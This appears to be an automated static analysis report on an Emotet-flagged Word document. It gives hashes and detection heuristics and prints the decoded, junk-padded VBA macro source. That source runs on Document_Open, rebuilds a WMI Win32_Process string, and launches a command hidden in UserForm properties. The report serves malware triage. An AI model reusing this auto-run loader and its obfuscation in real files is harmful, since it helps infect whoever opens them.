Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 04dfb2f392ec304d…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 196.6 KB
Created: 2019-12-18 09:56:00
Authoring application: Microsoft Office Word
First seen: 2020-05-14
MD5: e3403bea8d97d865ccb1542b9384a082
SHA-1: 60f6534e9b05bcc2b70bd43d9ca1b516d64fcf9b
SHA-256: 04dfb2f392ec304df0fe8ff84c4e9e1c4b6cab4f0b9ab8146de6e1cbdf744b3d
Risk score: 232

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-7464291-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7464291-0
  • VBA macros detected [medium, 4 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager [critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER]
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script:
    Foddsppkuff = Join(Split("32ksad_weddvwi32ksad_weddvnm3" + "2ksad_weddvgm32ksad_weddvts32ksad_weddv:32ksad_weddv" + "W32ksad_weddvin32ksad_weddv332ksad_weddv2_32ksad_weddv", MNDUE), "") + Yawhyqzkpr.Urwdatalesy + "rocess"
  • CreateObject call [high, OLE_VBA_CREATEOBJ]
    CreateObject call
    Matched line in script:
    Set Fcvvzzjpbdd = VBA.CreateObject(JJKBSKJ + Foddsppkuff)
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro [low, OLE_VBA_DOCOPEN]
    Document_Open macro
    Matched line in script:
    Private Sub Document_open()
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body; this is the standard DrawingML XML namespace URI)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10687 bytes
SHA-256: 4601893e6e8a820cb8f58f9f8e203c2bdfa442eb4d8d8015359fb0a473af67fe
Detection: ClamAV: No threats found
Obfuscation or payload: likely
344 of 513 identifiers look randomly generated (e.g. 'W32ksad_weddvin32ksad_weddv332ksad_weddv') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Yawhyqzkpr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Urwdatalesy, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Select Case Indahpwr
         Case Wazzowebwz
   Kkqqrbwgmbr = Sin(Dgdrjluzi)
   Txwalsaxdvdsk = CStr(Uuowujbslpbkn)
   Nbbtwufv = 324
   Btulzoszlrzk = Sin(Oseklkimkzh)
   Rvdoztdtpgg = CStr(Ikbwedpn)
   Pvkklojv = 567
   Xbeicarivylyy = Sin(Xlnveldm)
   Tpiseglcndh = CStr(Uelhsgsrwain)
   Azmtpnuilipqs = 5645
End Select
For Lgurrtrselfy = Ozfbkldakrtzm To Rbosvlto
      While Cigiikoykw <> Oioskvdyrh
         Njqgamuliph = Scgebbwvgngdd * Atn(Lyuvkrvythxyb) * (Zamvstwt + Bugwkdxlw)
      Wend
Next
   Select Case Bmuerlim
         Case Nsmjooecln
   Pxnqysefwajf = Sin(Gabqgepawykh)
   Bhfzmgxwqbmqh = CStr(Mjgdtieaugl)
   Bpgruedovks = 324
   Jjaepwjkkodee = Sin(Gksbbivbvvwdd)
   Znevyuzqrpv = CStr(Acnpnfilrrx)
   Hfittfjtpqz = 567
   Dgublgdebsig = Sin(Tfhvhfknuhxwp)
   Lmngvcbqqgqlj = CStr(Amehqohusd)
   Mndpqihqgua = 5645
End Select
For Roqpquahhgkri = Drvcnmodnq To Cpgfmkly
      While Ecihiegsxhd <> Ozygjdldzp
         Rbbyhxhjnnttf = Xusszdcrgn * Atn(Vomfmrjq) * (Uqkwpzbge + Tnjgwrupk)
      Wend
Next
   Select Case Etublhozpil
         Case Ackizvgy
   Ouuniwutbytp = Sin(Praxorhdfts)
   Rhcwrqafgr = CStr(Cvokpglzu)
   Vijwlkobv = 324
   Cmybcycjiz = Sin(Mwttpmgcrxz)
   Iupurpyzssc = CStr(Enwlliorwar)
   Operfmrotdmpq = 567
   Rtdqicitfg = Sin(Tvmuxdsaiua)
   Uzljkvuyfac = CStr(Ixgwzltw)
   Hjolxjzwtpbn = 5645
End Select
For Jvlrsnvjxxuvu = Putwhdzvjxofd To Zvujmeabd
      While Ymrrbonadviqv <> Zbudhszqxz
         Arpspmkfne = Ascglrezpcey * Atn(Cezwtsad) * (Ocsekowuiy + Psegvbvxnqk)
      Wend
Next
Dximwvhfjrbe
End Sub

Attribute VB_Name = "Dsncauqo"
Attribute VB_Base = "0{1B0B6CC2-8098-490A-9B4F-493863E97EAE}{4707F63C-022C-4F70-A3CB-BDF0B2D8AA0F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Xvcradjnifpb"
Function Jwqcmzlkvm()
   Select Case Fblpyswqjxmhf
         Case Htuwgekqb
   Dtwduyucrbk = Sin(Gxamhzlwmby)
   Wzsvlkpjo = CStr(Gcondvewudqi)
   Icnsqsxhmbujw = 324
   Jhruggelytrwb = Sin(Frpxcibrx)
   Yqmstyoxlwznw = CStr(Qpyyvwgh)
   Uznriptj = 567
   Oygzthepi = Sin(Sgyrlsyp)
   Irozzbfdgfem = CStr(Sjyfnsrzoab)
   Zwxutkqfhra = 5645
End Select
For Ymbayfxiz = Tbgajcoxgnfg To Kbsklrymhu
      While Nbvvfatdbrdpv <> Dmtsfspn
         Ynlvgumvm = Blhenfjsxc * Atn(Ovzobzeyn) * (Hmiiuxrujpq + Lnrmfvgc)
      Wend
Next
Hgxjqndjtodcc = Yawhyqzkpr.Urwdatalesy
   Select Case Rvdctltuqlb
         Case Illbmsxljt
   Vzkzxueoofs = Sin(Mmogvhowrsys)
   Jveibeoymjvs = CStr(Qycsygafjeomj)
   Glghcusk = 324
   Igoaflcqrgt = Sin(Ujsemztpu)
   Gxolocynecqa = CStr(Etlvsljqf)
   Kqfldbnjtuhwr = 567
   Hfleejgyifi = Sin(Llpscmem)
   Aacqslxx = CStr(Dddebhpdrxfv)
   Xieotexbpc = 5645
End Select
For Csnnlina = Hlrvxavuxe To Tkgidpvbnaty
      While Qdmxigloatwyh <> Ufgjkzdgc
         Eyvgstpakriaw = Ejnlehyus * Atn(Ouxmxjrjcn) * (Bdihmpmfjwev + Qaqfdckfeucx)
      Wend
Next
Fxkmvaokgetd = Hgxjqndjtodcc + Dsncauqo.Pcxficdafxv + Dsncauqo.Zapwmbwj + Dsncauqo.Nbkxiaaqsmx
   Select Case Mvotmjfk
         Case Fcyerzqzxv
   Ebvgahrtuf = Sin(Vyqwwypmgj)
   Hzaoglog = CStr(Qnxgixtk)
   Knititcy = 324
   Fumsyahcmj = Sin(Euhdzqprtw)
   Turhfnjpzuu = CStr(Fihqqxfj)
   Nmftmjprja = 567
   Djzwzzamjalcu = Sin(Bcypeuldv)
   Wgkclvcfexqt = CStr(Jmznadzea)
   Lktesgewfdt = 5645
End Select
For Opzodkkiz = Imquwtsgwnzl To Mrmxscqk
      While Ldlbqdglaywgq <> Llngtpeqnqsxl
         Eyurjtiqq = Okkegbcxh * Atn(Eyjhnykx) * (Estylyagduxn + Tgikrvoz)
      Wend
Next
Igeewuglwd = Fxkmvaokgetd + Dsncauqo.Uvqcrlowzsqr + Dsncauqo.Tbzyyocsxk.Factoid
   Select Case Srijgvbhrj
         Case Gsysljqdmbohm
   Ovgchixukyvk = Sin(Wuvokciqugcai)
   Cbwwzmllgtr = CStr(Ouqzmdqhtsbim)
   Azhzbdiw = 324
   Emkjousukbz = Sin(Nfgjjivo)
   Jkhmshugxrk = CStr(Fxfxincwckv)
   Uuyndaryaygi = 567
   Qvbyseoamd = Sin(Akrhalryma)
   Nkqreyyoib = CStr(Aldpeuiv)
   Zghtyvrbapo = 5645
End Select
For Hnxwnfweyy = Pibtssmhw To Kladxgbwmj
      While Chxuqfnbiqmj <> Ihxckowdmkn
         Xxcexpmzluxvb = Buzqphytyk * Atn(Yyvnhngpdf) * (Taqwnzgifnc + Wmrzedtydo)
      Wend
Next
Jwqcmzlkvm = Bivsjsdm + Igeewuglwd + Bivsjsdm
   Select Case Akforzxcjsik
         Case Drigxnti
   Ybyokfcypufv = Sin(Mivojovrezm)
   Ohbarsnppajs = CStr(Kvxvhqrtpse)
   Whxzcwln = 324
   Uodnbwhmwgy = Sin(Gdexcvrjvsnri)
   Gwrdthdh = CStr(Pwhfisgk)
   Vxyirzdywpw = 567
   Gfapusndw = Sin(Nykdnzhgwbfj)
   Lueelpgwr = CStr(Idlsxnzx)
   Toalwhqwdbwdg = 5645
End Select
For Jylknqgjdevwo = Glsmrfesoiq To Aefwbunonnr
      While Fwgakbxquk <> Rsfgxcxpsiyz
         Tkysybhezhmn = Cxftucjciiq * Atn(Puwygbpimrcm) * (Msyujejnude + Lrcqbmhrkdjfl)
      Wend
Next
End Function
Function Dximwvhfjrbe()
   Select Case Tggrfzlsq
         Case Iypnmvnzclun
   Rtxgrhohvnbnc = Sin(Oqvvmdtgtmsu)
   Uzswsognlyed = CStr(Blyszfov)
   Xvxnetznwlbn = 324
   Kanaexqjcqeh = Sin(Vmgzbayw)
   Irzqgpcnchiy = CStr(Qbbnthixfys)
   Bmitnkvrm = 567
   Dnorehswusjay = Sin(Ijlmayvk)
   Tnuowwdd = CStr(Fsrsygwpls)
   Ijblgaxbhc = 5645
End Select
For Ktxiywfwxax = Sntcfyiojfkm To Dfzddfbhfin
      While Mqnilltnndz <> Fbbnnvog
         Xxukqkhlooj = Wxyarcqcaazza * Atn(Vrdjkzpkradc) * (Lnujdfpouwdm + Wvlqeppwlalzg)
      Wend
Next
MNDUE = "32ksad_weddv"
Foddsppkuff = Join(Split("32ksad_weddvwi32ksad_weddvnm3" + "2ksad_weddvgm32ksad_weddvts32ksad_weddv:32ksad_weddv" + "W32ksad_weddvin32ksad_weddv332ksad_weddv2_32ksad_weddv", MNDUE), "") + Yawhyqzkpr.Urwdatalesy + "rocess"
   Select Case Etpxzjpkewjh
         Case Xjyfcaamj
   Triesfqhg = Sin(Jmkidsvdsqz)
   Ahzrtvrksq = CStr(Gfmqszvsjzlv)
   Hrfdqtdzekfyo = 324
   Cqveqwninarew = Sin(Veywnafp)
   Ohbblukjtg = CStr(Rdaujsdzpha)
   Basxyxbvrcp = 567
   Bggucrrgn = Sin(Trmlawggxnkt)
   Vjgtzblicq = CStr(Ufjlinfxegkq)
   Viotrmojgikm = 5645
End Select
For Jlownhcbxlew = Hoyqyefctjyl To Yaavzmntso
      While Sulcovyucsk <> Johreycdrcw
         Wbgnvknjll = Vcmjigqghpx * Atn(Nqblbror) * (Xoowzheycqajv + Ivgebhdzmitm)
      Wend
Next
Set Fcvvzzjpbdd = VBA.CreateObject(JJKBSKJ + Foddsppkuff)
   Select Case Kfrkhuyw
         Case Mjeerxofccnw
   Uupnolagfl = Sin(Amdixgyh)
   Zhcfwndd = CStr(Yhpmflhaugd)
   Pxbcuegyzvuv = 324
   Ipndcyxdsw = Sin(Mzymiwho)
   Uljyhpymv = CStr(Zylgcbuvmfflr)
   Znnxotzau = 567
   Dqhegbzemamf = Sin(Mszdpzrgaply)
   Eayreixd = CStr(Ydlnegnhh)
   Azweccxq = 5645
End Select
For Hdxambvbwxje = Loebtcerv To Bbmcfamw
      While Anmsesfleswh <> Nyvxppqiwwka
         Rxwidmlariojy = Ihtjtogeohz * Atn(Rpiejgtgvoeg) * (Hmjfqkrnpr + Kkshbekujba)
      Wend
Next
Itjufdscnigtg = Foddsppkuff + Dsncauqo.Gyeuzeheo.ControlTipText + Dsncauqo.Syytzdaga.ControlTipText
   Select Case Pzrmynln
         Case Tzebezbu
   Qlgdkqtw = Sin(Zbzwuwnkdi)
   Lfgzpfbwizgd = CStr(Tobiupkr)
   Zhhhmqqdnxzb = 324
   Anugdzuviq = Sin(Ivoxiubozhytk)
   Dqqdsrqig = CStr(Odxezqfn)
   Pqpfzimspawlr = 567
   Rnkhsmhce = Sin(Rviiowjmoabxt)
   Prugdlgyh = CStr(Fqihnkaaqqjh)
   Bfcfqprx = 5645
End Select
For Qiybmlwbftqtd = Rxssngjigc To Trndicmq
      While Znfuicsjhc <> Ysyfaqgzrygh
         Rqirrqgfxe = Yhpxvehasuec * Atn(Kfuagxqxkbap) * (Mtutsgszk + Cadswlgp)
      Wend
Next
Wkzbcvhhana = Itjufdscnigtg + Yawhyqzkpr.Urwdatalesy
   Select Case Zuzymqpy
         Case Ehywblpxtxuq
   Nctkpcimegaas = Sin(Sieajxtrgo)
   Npcjjpdk = CStr(Ejdlsdrvasyna)
   Quytkmwtavw = 324
   Rkpfzvdvxxfqa = Sin(Ddzomusveqy)
   Pdqvaudqc = CStr(Flttwtdkbip)
   Ipcypkoblvfuh = 567
   Fhxbkljaazy = Sin(Niazgunlseb)
   Mtqnzpjn = CStr(Lolkyoczqzbo)
   Fnnwendvjgzp = 5645
End Select
For Ajcahpoluj = Pflscxrvilbni To Peelieqygxa
      While Gusdhixxkr <> Yoeohoso
         Hqyfrzgeucqep = Yfavsfmakkqm * Atn(Iirnhmcfbqyqg) * (Kuzqvjir + Tupnvbmwe)
      Wend
Next
Set Dximwvhfjrbe = CreateObject(Wkzbcvhhana)
   Select Case Eaeulmygksyh
         Case Fnmvwaczrkk
   Qtzhyvjwxpq = Sin(Gieubyjiqu)
   Xmseiujmw = CStr(Klzlqthyvx)
   Tvximphzzlab = 324
   Rpvglnywtjcn = Sin(Iwsjltyjllx)
   Inzlxcybscp = CStr(Vxbogyvsrcsqq)
   Idjioyqiuxek = 567
   Ptdxmybiwfz = Sin(Qkhuhnftotgxz)
   Hqboafbjotd = CStr(Agejnbzymdw)
   Taawantnagd = 5645
End Select
For Rpbsaewo = Oxjxgpume To Mairtqydza
      While Nkjwudsaaztlz <> Mxgtytofosa
         Yluhoywnwta = Rkmhwscalf * Atn(Bfyfudtwe) * (Elxbucqefkm + Shviennf)
      Wend
Next
Dximwvhfjrbe.XSize = False
   Select Case Mcbltwcvepi
         Case Tazhdblmugbi
   Jmszdkbqrn = Sin(Ypfiobyq)
   Gekxacrw = CStr(Jnsimqee)
   Jmlbdwhl = 324
   Ksqfgnpfkyyun = Sin(Lxwwyxtbquts)
   Dvfezrqxmbya = CStr(Rdozshszkpuc)
   Zknufkgcsqnb = 567
   Kuxxxzjngta = Sin(Elqjxazx)
   Dvonokxmqfe = CStr(Sxerhletuei)
   Cgqacqigtbjl = 5645
End Select
For Ihkvypvy = Jrmxujrgkwhq To Cngjyvvgmiv
      While Ijnweuxrld <> Jkdayvrmut
         Lzrxdfeci = Wxadwxyrkv * Atn(Krfnmdapoyf) * (Daofzidkb + Xsvowbam)
      Wend
Next
Dximwvhfjrbe.YSize = False
   Select Case Iahufyhsema
         Case Mltyiajlooeo
   Owscuuetwib = Sin(Rhptwdxlq)
   Wcrftmcg = CStr(Tvlkfeqsp)
   Wsrdzvikwfxnr = 324
   Czajgvabymdi = Sin(Htayfzjabtruv)
   Whtenbqs = CStr(Bwqtrvmrl)
   Wpmficxgrm = 567
   Zcejecxqau = Sin(Dtgkxfcj)
   Zrhzfztlosa = CStr(Rnliooylbwhc)
   Nimjqljcmcfxy = 5645
End Select
For Gbdrbpxmxou = Xvzwqdfc To Jzhoajdrqb
      While Vekngqwovvlf <> Cigurmeststa
         Uwezhbav = Wpgnnooc * Atn(Hukvkkrdls) * (Tuuyrlxdr + Dybfqefdrrouz)
      Wend
Next
Do While Fcvvzzjpbdd.Create(UJNDB & Jwqcmzlkvm, Icyyuiydh, Dximwvhfjrbe, Mlbxpkiourbgp)
Loop
   Select Case Xoqciftiwq
         Case Wszphmizmu
   Azqgsycjfn = Sin(Pyjgetrpxaa)
   Vgqbdxcthcjp = CStr(Ynwejljajdb)
   Celzyflxrlic = 324
   Vivaqrdtc = Sin(Rylvxnzhfzpvc)
   Bsgcocthos = CStr(Leojckdg)
   Buyiukfgmtphq = 567
   Altyrxcjjod = Sin(Mlzdcbqmdgi)
   Hguodndv = CStr(Jipczlotquotb)
   Eouawflppq = 5645
End Select
For Vlqmukmpvnz = Omronnea To Yiuftxtzlcwti
      While Ujoeqrpca <> Taccrosmrdze
         Cnnpevdrgtdp = Hjfuyaesxj * Atn(Awieufvnn) * (Nvlpcuiz + Gehxegsnkpef)
      Wend
Next
End Function